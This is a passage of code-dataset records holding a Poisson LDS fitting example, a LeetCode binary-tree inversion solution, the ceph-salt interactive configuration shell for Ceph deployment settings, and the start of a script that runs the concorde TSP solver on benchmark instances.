A=C, b=b))\ndata, stateseq = truemodel.generate(T)\n\n# Fit with a Poisson LDS\nmodel = DefaultPoissonLDS(D_obs, D_latent)\nmodel.add_data(data, verbose=False)\n\nN_iters = 50\ndef em_update(model):\n model.EM_step()\n ll = model.log_likelihood()\n return ll\n\nlls = [em_update(model) for _ in progprint_xrange(N_iters)]\n\n# Plot the log likelihood over iterations\nplt.figure(figsize=(10,6))\nplt.plot(lls,'-b')\nplt.xlabel('iteration')\nplt.ylabel('log likelihood')\n\n# Plot the smoothed observations\nfig = plt.figure(figsize=(10,10))\nN_subplots = min(D_obs, 6)\nsmoothed_obs = model.states_list[0].smooth()\ntrue_smoothed_obs = truemodel.states_list[0].smooth()\n\nylims = (-0.1, 1.1)\nxlims = (0, min(T,1000))\n\nn_to_plot = np.arange(min(N_subplots, D_obs))\nfor i,j in enumerate(n_to_plot):\n ax = fig.add_subplot(N_subplots,1,i+1)\n # Plot spike counts\n given_ts = np.where(data[:,j]==1)[0]\n ax.plot(given_ts, np.ones_like(given_ts), 'ko', markersize=5)\n\n # Plot the inferred rate\n ax.plot([0], [0], 'ko', lw=2, label=\"observed data\")\n ax.plot(smoothed_obs[:,j], 'r', lw=2, label=\"poisson mean\")\n ax.plot(true_smoothed_obs[:,j], 'k', lw=2, label=\"true mean\")\n\n if i == 0:\n plt.legend(loc=\"upper center\", ncol=4, bbox_to_anchor=(0.5, 1.8))\n if i == N_subplots - 1:\n plt.xlabel('time index')\n ax.set_xlim(xlims)\n ax.set_ylim(0, 1.1)\n ax.set_ylabel(\"$x_%d(t)$\" % (j+1))\n\nplt.show()\n\n","sub_path":"examples/poisson_lds.py","file_name":"poisson_lds.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"566031948","text":"\"\"\"\nInvert a binary tree.\n\n 4\n / \\\n 2 7\n / \\ / \\\n1 3 6 9\nto\n 4\n / \\\n 7 2\n / \\ / \\\n9 6 3 1\n\"\"\"\nclass Solution(object):\n def invertTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: TreeNode\n \"\"\"\n if root is None:\n return root\n left = 
self.invertTree(root.left)\n right = self.invertTree(root.right)\n root.left, root.right = right, left\n return root\n#BFS\nfrom collections import deque\nclass Solution(object):\n def invertTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: TreeNode\n \"\"\"\n if not root:\n return root\n q = deque()\n q.append(root)\n while len(q) > 0:\n cur = q.popleft()\n left = cur.left\n cur.left = cur.right\n cur.right = left\n \n if cur.left:\n q.append(cur.left)\n if cur.right:\n q.append(cur.right)\n return root","sub_path":"interview/others/easy/LC226. Invert Binary Tree.py","file_name":"LC226. Invert Binary Tree.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"325187625","text":"# pylint: disable=arguments-differ\nimport logging\nimport fnmatch\nimport json\n\n\nfrom pyparsing import alphanums, OneOrMore, Optional, Regex, Suppress, Word\n\nimport configshell_fb as configshell\nfrom configshell_fb.shell import locatedExpr\n\nfrom .core import CephNodeManager, SshKeyManager, CephNode\nfrom .exceptions import CephSaltException, MinionDoesNotExistInConfiguration, PillarFileNotPureYaml\nfrom .salt_utils import GrainsManager, PillarManager, SaltClient, CephOrch\nfrom .terminal_utils import PrettyPrinter as PP\nfrom .validate.config import validate_config\nfrom .validate.salt_master import check_salt_master_status, CephSaltPillarNotConfigured\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass OptionHandler:\n def value(self):\n return None, None\n\n def save(self, value):\n pass\n\n def reset(self):\n pass\n\n def read_only(self):\n return False\n\n def possible_values(self):\n return []\n\n # pylint: disable=unused-argument\n def children_handler(self, child_name):\n return None\n\n def commands_map(self):\n return {}\n\n\nclass PillarHandler(OptionHandler):\n def __init__(self, pillar_path):\n self.pillar_path = pillar_path\n\n def value(self):\n return PillarManager.get(self.pillar_path), None\n\n def save(self, value):\n PillarManager.set(self.pillar_path, value)\n\n def reset(self):\n PillarManager.reset(self.pillar_path)\n\n def read_only(self):\n return False\n\n\nclass BootstrapMinionHandler(PillarHandler):\n def __init__(self):\n super().__init__('ceph-salt:bootstrap_minion')\n\n def save(self, value):\n if value not in self.possible_values():\n raise MinionDoesNotExistInConfiguration(value)\n node = CephNodeManager.ceph_salt_nodes()[value]\n PillarManager.set('ceph-salt:bootstrap_mon_ip', node.public_ip)\n super().save(value)\n\n def possible_values(self):\n return [n.minion_id for n in CephNodeManager.ceph_salt_nodes().values()]\n\n\nclass RolesGroupHandler(OptionHandler):\n def value(self):\n return '', None\n\n\nclass RoleElementHandler(OptionHandler):\n def __init__(self, ceph_salt_node, role):\n self.ceph_salt_node = ceph_salt_node\n self.role = role\n\n def value(self):\n roles = CephNodeManager.all_roles(self.ceph_salt_node)\n if not roles - {self.role}:\n return 'no other roles', None\n return \"other roles: {}\".format(\", \".join(roles - {self.role})), None\n\n\nclass RoleHandler(OptionHandler):\n def __init__(self, role):\n self.role = role\n self._value = set()\n\n def _load(self):\n self._value = {n.minion_id for n in CephNodeManager.ceph_salt_nodes().values()\n if self.role in n.roles}\n\n def possible_values(self):\n self._load()\n return [n.minion_id for n in CephNodeManager.ceph_salt_nodes().values()]\n\n def value(self):\n self._load()\n return self._value, 
True\n\n def save(self, value):\n self._load()\n _minions = set(value)\n to_remove = self._value - _minions\n to_add = _minions - self._value\n\n for minion in to_remove:\n CephNodeManager.ceph_salt_nodes()[minion].roles.remove(self.role)\n CephNodeManager.ceph_salt_nodes()[minion].save()\n\n for minion in to_add:\n CephNodeManager.ceph_salt_nodes()[minion].add_role(self.role)\n CephNodeManager.ceph_salt_nodes()[minion].save()\n\n CephNodeManager.save_in_pillar()\n\n self._value = set(value)\n\n def children_handler(self, child_name):\n return RoleElementHandler(CephNodeManager.ceph_salt_nodes()[child_name], self.role)\n\n\nclass CephSaltNodeHandler(OptionHandler):\n def __init__(self, ceph_salt_node):\n self.ceph_salt_node = ceph_salt_node\n\n def value(self):\n roles = CephNodeManager.all_roles(self.ceph_salt_node)\n if not roles:\n return 'no roles', None\n return \", \".join(roles), None\n\n\nclass CephSaltNodesHandler(OptionHandler):\n def __init__(self):\n self._minions = set()\n self._ceph_salt_nodes = set()\n\n def value(self):\n self._ceph_salt_nodes = {n.minion_id for n in CephNodeManager.ceph_salt_nodes().values()}\n return self._ceph_salt_nodes, True\n\n def save(self, value):\n _value = set(value)\n to_remove = self._ceph_salt_nodes - _value\n to_add = _value - self._ceph_salt_nodes\n\n for minion in to_remove:\n CephNodeManager.remove_node(minion)\n for minion in to_add:\n CephNodeManager.add_node(minion)\n\n self._ceph_salt_nodes = set(value)\n\n def possible_values(self):\n if not self._minions:\n self._minions = set(CephNodeManager.list_all_minions())\n return self._minions - self._ceph_salt_nodes\n\n def children_handler(self, child_name):\n return CephSaltNodeHandler(CephNodeManager.ceph_salt_nodes()[child_name])\n\n\nclass SSHGroupHandler(OptionHandler):\n def commands_map(self):\n return {\n 'generate': self.generate_key_pair\n }\n\n def generate_key_pair(self):\n private_key, public_key = SshKeyManager.generate_key_pair()\n PillarManager.set('ceph-salt:ssh:private_key', private_key)\n PillarManager.set('ceph-salt:ssh:public_key', public_key)\n PP.pl_green('Key pair generated.')\n\n def value(self):\n stored_priv_key = PillarManager.get('ceph-salt:ssh:private_key')\n stored_pub_key = PillarManager.get('ceph-salt:ssh:public_key')\n if not stored_priv_key and not stored_pub_key:\n return \"no key pair set\", False\n if not stored_priv_key or not stored_pub_key:\n return \"invalid key pair\", False\n try:\n SshKeyManager.check_keys(stored_priv_key, stored_pub_key)\n return \"Key Pair set\", True\n except Exception: # pylint: disable=broad-except\n return \"invalid key pair\", False\n\n\nclass SshPrivateKeyHandler(PillarHandler):\n def __init__(self):\n super(SshPrivateKeyHandler, self).__init__('ceph-salt:ssh:private_key')\n\n def value(self):\n stored_priv_key, _ = super(SshPrivateKeyHandler, self).value()\n stored_pub_key = PillarManager.get('ceph-salt:ssh:public_key')\n try:\n SshKeyManager.check_private_key(stored_priv_key, stored_pub_key)\n return SshKeyManager.key_fingerprint(stored_pub_key), None\n except Exception as ex: # pylint: disable=broad-except\n return str(ex), False\n\n\nclass SshPublicKeyHandler(PillarHandler):\n def __init__(self):\n super(SshPublicKeyHandler, self).__init__('ceph-salt:ssh:public_key')\n\n def value(self):\n stored_pub_key, _ = super(SshPublicKeyHandler, self).value()\n stored_priv_key = PillarManager.get('ceph-salt:ssh:private_key')\n try:\n SshKeyManager.check_public_key(stored_priv_key, stored_pub_key)\n return 
SshKeyManager.key_fingerprint(stored_pub_key), None\n except Exception as ex: # pylint: disable=broad-except\n return str(ex), False\n\n\nclass FlagGroupPillarHandler(OptionHandler):\n def __init__(self, pillar_path, default):\n self.pillar_path = pillar_path\n self.default = default\n\n def commands_map(self):\n return {\n 'enable': self.enable,\n 'disable': self.disable,\n 'reset': self.reset\n }\n\n def enable(self):\n PillarManager.set(self.pillar_path, True)\n PP.pl_green('Enabled.')\n\n def disable(self):\n PillarManager.set(self.pillar_path, False)\n PP.pl_green('Disabled.')\n\n def reset(self):\n PillarManager.reset(self.pillar_path)\n PP.pl_green('Value reset.')\n\n def value(self):\n val = PillarManager.get(self.pillar_path)\n if val is None:\n val = self.default\n return (\"enabled\", True) if val else (\"disabled\", True)\n\n\nclass TimeServerGroupHandler(OptionHandler):\n def commands_map(self):\n return {\n 'enable': self.enable,\n 'disable': self.disable\n }\n\n def enable(self):\n PillarManager.set('ceph-salt:time_server:enabled', True)\n PP.pl_green('Enabled.')\n\n def disable(self):\n PillarManager.set('ceph-salt:time_server:enabled', False)\n PP.pl_green('Disabled.')\n\n def value(self):\n val = PillarManager.get('ceph-salt:time_server:enabled')\n if val is None:\n return \"enabled\", True\n if val: # enabled\n host = PillarManager.get('ceph-salt:time_server:server_host')\n if host is None:\n return \"enabled, no server host set\", False\n\n return (\"enabled\", True) if val else (\"disabled\", True)\n\n\nclass TimeServerHandler(PillarHandler):\n def possible_values(self):\n return [n.minion_id for n in CephNodeManager.ceph_salt_nodes().values()]\n\n\nCEPH_SALT_OPTIONS = {\n 'Ceph_Cluster': {\n 'help': '''\n Cluster Options Configuration\n ====================================\n Options to specify the structure of the Ceph cluster, like\n membership, roles, etc...\n ''',\n 'options': {\n 'Minions': {\n 'help': 'The list of salt minions that are used to deploy Ceph',\n 'default': [],\n 'type': 'minions',\n 'handler': CephSaltNodesHandler()\n },\n 'Roles': {\n 'type': 'group',\n 'handler': RolesGroupHandler(),\n 'help': '''\n Roles Configuration\n ====================================\n ''',\n 'options': {\n 'Admin': {\n 'type': 'minions',\n 'default': [],\n 'handler': RoleHandler('admin'),\n 'help': 'List of minions with Admin role'\n },\n 'Bootstrap': {\n 'help': 'Cluster\\'s first Mon and Mgr',\n 'handler': BootstrapMinionHandler(),\n 'required': True,\n 'default_text': 'no minion',\n 'default': None\n },\n }\n },\n }\n },\n 'Containers': {\n 'help': '''\n Container Options Configuration\n ====================================\n Options to control the configuration of the Ceph containers used\n for deployment.\n ''',\n 'options': {\n 'Images': {\n 'type': 'group',\n 'help': \"Container images paths\",\n 'options': {\n 'ceph': {\n 'help': 'Full path of Ceph container image',\n 'default_text': 'no image path',\n 'required': True,\n 'handler': PillarHandler('ceph-salt:container:images:ceph')\n },\n }\n },\n }\n },\n 'System_Update': {\n 'help': '''\n System Update Options Configuration\n =========================================\n Options to control system updates\n ''',\n 'options': {\n 'Packages': {\n 'type': 'flag',\n 'help': 'Update all packages',\n 'handler': PillarHandler('ceph-salt:updates:enabled'),\n 'default': True\n },\n 'Reboot': {\n 'type': 'flag',\n 'help': 'Reboot if needed',\n 'handler': PillarHandler('ceph-salt:updates:reboot'),\n 'default': True\n }\n }\n 
},\n 'Cephadm_Bootstrap': {\n 'help': '''\n Cluster Bootstrap Options Configuration\n =========================================\n Options to control the Ceph cluster bootstrap\n ''',\n 'handler': FlagGroupPillarHandler('ceph-salt:bootstrap_enabled', True),\n 'options': {\n 'Ceph_Conf': {\n 'type': 'conf',\n 'help': 'Bootstrap Ceph configuration',\n 'default': [],\n 'handler': PillarHandler('ceph-salt:bootstrap_ceph_conf')\n },\n 'Dashboard': {\n 'type': 'group',\n 'help': 'Dashboard settings',\n 'options': {\n 'password': {\n 'default': None,\n 'default_text': 'randomly generated',\n 'sensitive': True,\n 'handler': PillarHandler('ceph-salt:dashboard:password')\n },\n 'username': {\n 'default': 'admin',\n 'handler': PillarHandler('ceph-salt:dashboard:username')\n }\n }\n },\n 'Mon_IP': {\n 'help': 'Bootstrap Mon IP',\n 'default': None,\n 'handler': PillarHandler('ceph-salt:bootstrap_mon_ip')\n },\n }\n },\n 'SSH': {\n 'help': '''\n SSH Keys configuration\n ============================\n Options for configuring the SSH keys used by the SSH orchestrator\n ''',\n 'handler': SSHGroupHandler(),\n 'options': {\n 'Private_Key': {\n 'default': None,\n 'help': \"SSH RSA private key\",\n 'handler': SshPrivateKeyHandler()\n },\n 'Public_Key': {\n 'default': None,\n 'help': \"SSH RSA public key\",\n 'handler': SshPublicKeyHandler()\n },\n }\n },\n 'Time_Server': {\n 'help': '''\n Time Server Deployment Options\n ==============================\n Options to customize time server deployment and configuration.\n ''',\n 'handler': TimeServerGroupHandler(),\n 'options': {\n 'External_Servers': {\n 'type': 'list',\n 'default': [],\n 'help': 'List of external NTP servers',\n 'handler': PillarHandler('ceph-salt:time_server:external_time_servers')\n },\n 'Server_Hostname': {\n 'default': None,\n 'help': 'FQDN of the time server node',\n 'handler': TimeServerHandler('ceph-salt:time_server:server_host'),\n 'required': True\n },\n }\n },\n}\n\n\nclass CephSaltRoot(configshell.ConfigNode):\n help_intro = '''\n ceph-salt Configuration\n =====================\n This is a shell where you can manipulate ceph-salt's configuration.\n Each configuration option is present under a configuration group.\n You can navigate through the groups and options using the B{ls} and\n B{cd} commands as in a typical shell.\n In each path you can type B{help} to see the available commands.\n Different options might have different commands available.\n '''\n\n def __init__(self, shell):\n configshell.ConfigNode.__init__(self, '/', shell=shell)\n\n def list_commands(self):\n return tuple(['cd', 'ls', 'help', 'exit'])\n\n def summary(self):\n return \"\", None\n\n\nclass GroupNode(configshell.ConfigNode):\n def __init__(self, group_name, help, handler, parent):\n configshell.ConfigNode.__init__(self, group_name, parent)\n self.group_name = group_name\n self.help_intro = help\n self.handler = handler\n\n if self.handler:\n for cmd, func in self.handler.commands_map().items():\n setattr(self, 'ui_command_{}'.format(cmd), func)\n\n def list_commands(self):\n cmds = ['cd', 'ls', 'help', 'exit', 'reset', 'set']\n if self.handler:\n cmds.extend(list(self.handler.commands_map().keys()))\n return tuple(cmds)\n\n def summary(self):\n if self.handler:\n return self.handler.value()\n return \"\", None\n\n def ui_command_set(self, option_name, value):\n '''\n Sets the value of option\n '''\n self.get_child(option_name).ui_command_set(value)\n\n def ui_command_reset(self, option_name):\n '''\n Resets option value to the default\n '''\n 
self.get_child(option_name).ui_command_reset()\n\n\nclass OptionNode(configshell.ConfigNode):\n def __init__(self, option_name, option_dict, parent):\n configshell.ConfigNode.__init__(self, option_name, parent)\n self.option_name = option_name\n self.option_dict = option_dict\n self.help_intro = option_dict.get('help', ' ')\n self.value = None\n\n def _list_commands(self):\n return []\n\n def list_commands(self):\n cmds = ['cd', 'ls', 'help', 'exit', 'reset']\n cmds.extend(self._list_commands())\n return tuple(cmds)\n\n def _find_value(self):\n if self.value is None:\n value = None\n if 'handler' in self.option_dict:\n value, val_type = self.option_dict['handler'].value()\n if value is not None:\n if self.option_dict.get('sensitive', False):\n return '***', None\n return value, val_type\n if 'default_text' in self.option_dict:\n val_type = None\n if self.option_dict.get('required', False):\n val_type = False\n return self.option_dict['default_text'], val_type\n if 'default' in self.option_dict:\n return self.option_dict['default'], None\n raise Exception(\"No default value found for {}\".format(self.option_name))\n return self.value, None\n\n def summary(self):\n value, val_type = self._find_value()\n if isinstance(value, bool):\n value = 'enabled' if value else 'disabled'\n if value is None and self.option_dict.get('required', False):\n return 'not set', False\n\n value_str = str(value)\n return value_str, val_type\n\n def ui_command_reset(self):\n '''\n Resets option value to the default\n '''\n if 'handler' in self.option_dict:\n self.option_dict['handler'].reset()\n else:\n self.value = None\n PP.pl_green('Value reset.')\n\n def _read_only(self):\n if 'handler' in self.option_dict:\n return self.option_dict['handler'].read_only()\n return False\n\n\nclass ValueOptionNode(OptionNode):\n def _list_commands(self):\n return ['set']\n\n def ui_command_set(self, value):\n '''\n Sets the value of option\n '''\n if self._read_only():\n raise Exception(\"Option {} cannot be modified\".format(self.option_name))\n if 'handler' in self.option_dict:\n self.option_dict['handler'].save(value)\n else:\n self.value = value\n PP.pl_green('Value set.')\n\n def ui_complete_set(self, parameters, text, current_param):\n matching = []\n for value in self.option_dict['handler'].possible_values():\n if value.startswith(text):\n matching.append(value)\n return matching\n\n\nclass FlagOptionNode(OptionNode):\n def _list_commands(self):\n return ['enable', 'disable']\n\n def _set_option_value(self, bool_value):\n if self._read_only():\n raise Exception(\"Option {} cannot be modified\".format(self.option_name))\n if 'handler' in self.option_dict:\n self.option_dict['handler'].save(bool_value)\n else:\n self.value = bool_value\n\n def ui_command_enable(self):\n '''\n Enables the option\n '''\n self._set_option_value(True)\n PP.pl_green('Enabled.')\n\n def ui_command_disable(self):\n '''\n Disables the option\n '''\n self._set_option_value(False)\n PP.pl_green('Disabled.')\n\n\nclass ListElementNode(configshell.ConfigNode):\n def __init__(self, value, parent):\n configshell.ConfigNode.__init__(self, value, parent)\n\n\nclass ListOptionNode(OptionNode):\n def __init__(self, option_name, option_dict, parent):\n super(ListOptionNode, self).__init__(option_name, option_dict, parent)\n value_list, _ = self._find_value()\n self.value = list(value_list)\n for value in value_list:\n ListElementNode(value, self)\n\n def _list_commands(self):\n return ['add', 'remove']\n\n def summary(self):\n value_list, _ = 
self._find_value()\n return str(len(value_list)) if value_list else 'empty', None\n\n def ui_command_add(self, value):\n if value not in self.value:\n self.value.append(value)\n self.option_dict['handler'].save(self.value)\n ListElementNode(value, self)\n PP.pl_green('Value added.')\n else:\n PP.pl_red('Value already exists.')\n\n def ui_command_remove(self, value):\n if value in self.value:\n self.value.remove(value)\n self.option_dict['handler'].save(self.value)\n self.remove_child(self.get_child(value))\n PP.pl_green('Value removed.')\n else:\n PP.pl_red('Value not found.')\n\n\nclass ConfElementNode(configshell.ConfigNode):\n def __init__(self, key, value, parent):\n configshell.ConfigNode.__init__(self, key, parent)\n self.value = value\n\n def summary(self):\n return self.value, None\n\n\nclass ConfSectionNode(OptionNode):\n def __init__(self, option_name, option_dict, parent):\n super(ConfSectionNode, self).__init__(option_name, option_dict, parent)\n value_dict, _ = self._find_value()\n self.value = dict(value_dict)\n for parameter, value in self.value.items():\n ConfElementNode(parameter, value, self)\n\n def _list_commands(self):\n return ['set', 'remove']\n\n def summary(self):\n return '', None\n\n @staticmethod\n def _normalize(text):\n text = text.strip()\n if text.startswith('\"') and text.endswith('\"'):\n text = text[1:-1]\n return text.strip()\n\n def ui_command_set(self, expr):\n \"\"\"\n Expression has \" = \" format.\n\n Example: set osd crush chooseleaf type = 0\n \"\"\"\n separator_count = expr.count('=')\n if separator_count != 1:\n PP.pl_red(\"Invalid format, try 'set = '.\")\n return\n expr = self._normalize(expr)\n parameter, value = [self._normalize(s) for s in expr.split('=')]\n child = None\n if parameter in self.value:\n child = self.get_child(parameter)\n self.value[parameter] = value\n self.option_dict['handler'].save(self.value)\n if child:\n child.value = value\n else:\n ConfElementNode(parameter, value, self)\n PP.pl_green('Parameter set.')\n\n def ui_command_remove(self, parameter):\n parameter = self._normalize(parameter)\n if parameter in self.value:\n self.value.pop(parameter)\n self.option_dict['handler'].save(self.value)\n self.remove_child(self.get_child(parameter))\n PP.pl_green('Parameter removed.')\n else:\n PP.pl_red('Parameter not found.')\n\n def ui_command_reset(self):\n for key in self.value.keys():\n self.remove_child(self.get_child(key))\n self.value = {}\n self.option_dict['handler'].save(self.value)\n PP.pl_green('Section reset.')\n\n\nclass ConfOptionNode(OptionNode):\n def __init__(self, option_name, option_dict, parent):\n super(ConfOptionNode, self).__init__(option_name, option_dict, parent)\n value_dict, _ = self._find_value()\n self.value = dict(value_dict)\n for section in self.value.keys():\n self.add_child(section)\n\n def add_child(self, section):\n handler: PillarHandler = self.option_dict['handler']\n ConfSectionNode(section, {\n 'handler': PillarHandler('{}:{}'.format(handler.pillar_path, section)),\n 'default': {}\n }, self)\n\n def _list_commands(self):\n return ['add', 'remove']\n\n def summary(self):\n return '', None\n\n def ui_command_add(self, section):\n if section not in self.value:\n self.value[section] = {}\n self.option_dict['handler'].save(self.value)\n self.add_child(section)\n PP.pl_green('Section added.')\n else:\n PP.pl_red('Section already exists.')\n\n def ui_command_remove(self, section):\n if section in self.value:\n self.value.pop(section)\n self.option_dict['handler'].save(self.value)\n 
self.remove_child(self.get_child(section))\n PP.pl_green('Section removed.')\n else:\n PP.pl_red('Section not found.')\n\n def ui_command_reset(self):\n for key in self.value.keys():\n self.remove_child(self.get_child(key))\n self.value = {}\n self.option_dict['handler'].save(self.value)\n PP.pl_green('Config reset.')\n\n\nclass MinionOptionNode(configshell.ConfigNode):\n def __init__(self, minion, handler, parent):\n configshell.ConfigNode.__init__(self, minion, parent)\n self.handler = handler\n\n def summary(self):\n if self.handler:\n return self.handler.value()\n return \"\", None\n\n\nclass MinionsOptionNode(OptionNode):\n def __init__(self, option_name, option_dict, parent):\n super(MinionsOptionNode, self).__init__(option_name, option_dict, parent)\n value_list, _ = self._find_value()\n self.value = list(value_list)\n for value in value_list:\n MinionOptionNode(value, option_dict['handler'].children_handler(value), self)\n\n def _list_commands(self):\n return ['add', 'rm']\n\n def summary(self):\n value_list, val_type = self._find_value()\n if value_list:\n return \"Minions: {}\".format(str(len(value_list))), val_type\n return 'no minions', False\n\n def ui_command_add(self, minion_id):\n matching = fnmatch.filter(self.option_dict['handler'].possible_values(), minion_id)\n counter = 0\n has_errors = False\n for match in matching:\n if match not in self.value:\n new_value = list(self.value)\n new_value.append(match)\n try:\n self.option_dict['handler'].save(new_value)\n self.value = new_value\n MinionOptionNode(match, self.option_dict['handler'].children_handler(match),\n self)\n counter += 1\n except CephSaltException as ex:\n logger.exception(ex)\n PP.pl_red(ex)\n has_errors = True\n if counter == 1:\n PP.pl_green('1 minion added.')\n elif counter > 1:\n PP.pl_green('{} minions added.'.format(counter))\n elif not has_errors:\n PP.pl_red('No minions matched \"{}\".'.format(minion_id))\n\n def ui_command_rm(self, minion_id):\n matching = fnmatch.filter(self.value, minion_id)\n counter = 0\n has_errors = False\n for match in matching:\n new_value = list(self.value)\n new_value.remove(match)\n try:\n self.option_dict['handler'].save(new_value)\n self.value = new_value\n self.remove_child(self.get_child(match))\n counter += 1\n except CephSaltException as ex:\n logger.exception(ex)\n PP.pl_red(ex)\n has_errors = True\n if counter == 1:\n PP.pl_green('1 minion removed.')\n elif counter > 1:\n PP.pl_green('{} minions removed.'.format(counter))\n elif not has_errors:\n PP.pl_red('No minions matched \"{}\".'.format(minion_id))\n\n # pylint: disable=unused-argument\n def ui_complete_add(self, parameters, text, current_param):\n matching = []\n for minion in self.option_dict['handler'].possible_values():\n if minion.startswith(text):\n matching.append(minion)\n return matching\n\n def ui_complete_rm(self, parameters, text, current_param):\n matching = []\n for minion in self.value:\n if minion.startswith(text):\n matching.append(minion)\n return matching\n\n\ndef _generate_option_node(option_name, option_dict, parent):\n if option_dict.get('type', None) == 'group':\n _generate_group_node(option_name, option_dict, parent)\n return\n\n if 'options' in option_dict:\n raise Exception(\"Invalid option node {}\".format(option_name))\n\n if option_dict.get('type', None) == 'flag':\n FlagOptionNode(option_name, option_dict, parent)\n elif option_dict.get('type', None) == 'list':\n ListOptionNode(option_name, option_dict, parent)\n elif option_dict.get('type', None) == 'conf':\n 
ConfOptionNode(option_name, option_dict, parent)\n elif option_dict.get('type', None) == 'minions':\n MinionsOptionNode(option_name, option_dict, parent)\n else:\n ValueOptionNode(option_name, option_dict, parent)\n\n\ndef _generate_group_node(group_name, group_dict, parent):\n group_node = GroupNode(group_name, group_dict.get('help', \"\"), group_dict.get('handler', None),\n parent)\n for option_name, option_dict in group_dict['options'].items():\n _generate_option_node(option_name, option_dict, group_node)\n\n\ndef generate_config_shell_tree(shell):\n root_node = CephSaltRoot(shell)\n for group_name, group_dict in CEPH_SALT_OPTIONS.items():\n _generate_group_node(group_name, group_dict, root_node)\n\n\nclass CephSaltConfigShell(configshell.ConfigShell):\n # pylint: disable=anomalous-backslash-in-string\n def __init__(self):\n super(CephSaltConfigShell, self).__init__(\n '~/.ceph_salt_config_shell')\n # Grammar of the command line\n command = locatedExpr(Word(alphanums + '_'))('command')\n var = Word(alphanums + ';,=_\\+/.<>()~@:-%[]*{}\" ') # adding '*'\n value = var\n keyword = Word(alphanums + '_\\-')\n kparam = locatedExpr(keyword + Suppress('=') + Optional(value, default=''))('kparams*')\n pparam = locatedExpr(var)('pparams*')\n parameter = kparam | pparam\n parameters = OneOrMore(parameter)\n bookmark = Regex('@([A-Za-z0-9:_.]|-)+')\n pathstd = Regex('([A-Za-z0-9:_.\\[\\]]|-)*' + '/' + '([A-Za-z0-9:_.\\[\\]/]|-)*') | '..' | '.'\n path = locatedExpr(bookmark | pathstd | '*')('path')\n parser = Optional(path) + Optional(command) + Optional(parameters)\n self._parser = parser\n\n\ndef check_config_prerequesites():\n try:\n check_salt_master_status()\n return True\n except CephSaltPillarNotConfigured:\n try:\n PillarManager.install_pillar()\n return True\n except PillarFileNotPureYaml:\n PP.println(\"\"\"\nceph-salt pillar file is not installed yet, and we can't add it automatically\nbecause pillar's top.sls is probably using Jinja2 expressions.\nPlease create a ceph-salt.sls file in salt's pillar directory with the following\ncontent:\n\nceph-salt: {}\n\nand add the following pillar configuration to top.sls file:\n\nbase:\n 'ceph-salt:member':\n - match: grain\n - ceph-salt\n\"\"\")\n return False\n\n\ndef count_hosts(host_ls):\n all_nodes = PillarManager.get('ceph-salt:minions:all')\n deployed = []\n not_managed = []\n for host in host_ls:\n if host['hostname'] in all_nodes:\n deployed.append(host)\n else:\n not_managed.append(host)\n return (len(all_nodes), len(deployed), len(not_managed))\n\n\ndef run_status():\n if not check_config_prerequesites():\n return False\n status = {}\n result = True\n host_ls = CephOrch.host_ls()\n ceph_salt_nodes, deployed_nodes, not_managed_nodes = count_hosts(host_ls)\n status['hosts'] = '{}/{} deployed'.format(deployed_nodes, ceph_salt_nodes)\n if not_managed_nodes:\n status['hosts'] += ' ({} hosts not managed by cephsalt)'.format(not_managed_nodes)\n error_msg = validate_config(host_ls)\n if error_msg:\n result = False\n logger.info(error_msg)\n status['config'] = PP.red(error_msg)\n else:\n status['config'] = PP.green(\"OK\")\n for k, v in status.items():\n PP.println('{}{}'.format('{}: '.format(k).ljust(8), v))\n return result\n\n\ndef run_config_shell():\n if not check_config_prerequesites():\n return False\n shell = CephSaltConfigShell()\n generate_config_shell_tree(shell)\n while True:\n try:\n shell.run_interactive()\n break\n except (configshell.ExecutionError, CephSaltException) as ex:\n logger.exception(ex)\n PP.pl_red(ex)\n return 
True\n\n\ndef run_config_cmdline(cmdline):\n if not check_config_prerequesites():\n return False\n shell = CephSaltConfigShell()\n generate_config_shell_tree(shell)\n logger.info(\"running command: %s\", cmdline)\n shell.run_cmdline(cmdline)\n return True\n\n\ndef run_export(pretty):\n config = PillarManager.get('ceph-salt')\n if pretty:\n PP.println(json.dumps(config, indent=4, sort_keys=True))\n else:\n PP.println(json.dumps(config))\n return True\n\n\ndef _get_salt_minions_by_host():\n salt_minions_by_host = {}\n minions = SaltClient.caller().cmd('minion.list')['minions']\n for minion_id in minions:\n short_name = minion_id.split('.', 1)[0]\n salt_minions_by_host[short_name] = minion_id\n return salt_minions_by_host\n\n\ndef run_import(config_file):\n with open(config_file) as json_file:\n config = json.load(json_file)\n salt_minions_by_host = _get_salt_minions_by_host()\n minions_config = config.get('minions', {})\n # Validate\n for host in minions_config.get('all', []):\n if host not in salt_minions_by_host:\n PP.pl_red(\"Cannot find host '{}'\".format(host))\n return False\n # Update pillar\n PillarManager.set('ceph-salt', config)\n # Update grains\n minions = GrainsManager.filter_by('ceph-salt', 'member')\n if minions:\n GrainsManager.del_grain(minions, 'ceph-salt')\n for host in minions_config.get('all', []):\n node = CephNode(salt_minions_by_host[host])\n if host in minions_config.get('admin', []):\n node.add_role('admin')\n node.save()\n PP.pl_green('Configuration imported.')\n return True\n","sub_path":"ceph_salt/config_shell.py","file_name":"config_shell.py","file_ext":"py","file_size_in_byte":34981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"525915793","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport itertools\nimport os\nimport multiprocessing\nimport re\n\ndef launcher(tsp_base, n_items_per_city, type_of_items):\n num_items = (int(re.sub('\\D', '', tsp_base)) - 1) * n_items_per_city\n if os.path.isfile(\"tsp_opt_sols/%s.opt.tsp.sol\" % (tsp_base)):\n return\n os.system(\"./concorde --inputfile ../ttp_instances/%s-ttp/%s_n%d_%s_01.ttp > tsp_opt_sols/%s.opt.tsp.log\" % (tsp_base, tsp_base, num_items, type_of_items, tsp_base))\n\nif __name__ == \"__main__\":\n\n tsp_bases = [\"eil51\", \"berlin52\", \"st70\", \"eil76\", \"pr76\", \"rat99\", \"kroA100\", \"kroB100\", \"kroC100\", \"kroD100\", \"kroE100\", \"rd100\", \"eil101\", \"lin105\", \"pr107\", \"pr124\", \"bier127\", \"ch130\", \"pr136\", \"pr144\", \"ch150\", \"kroA150\", \"kroB150\", \"pr152\", \"u159\", \"rat195\", \"d198\", \"kroA200\", \"kroB200\", 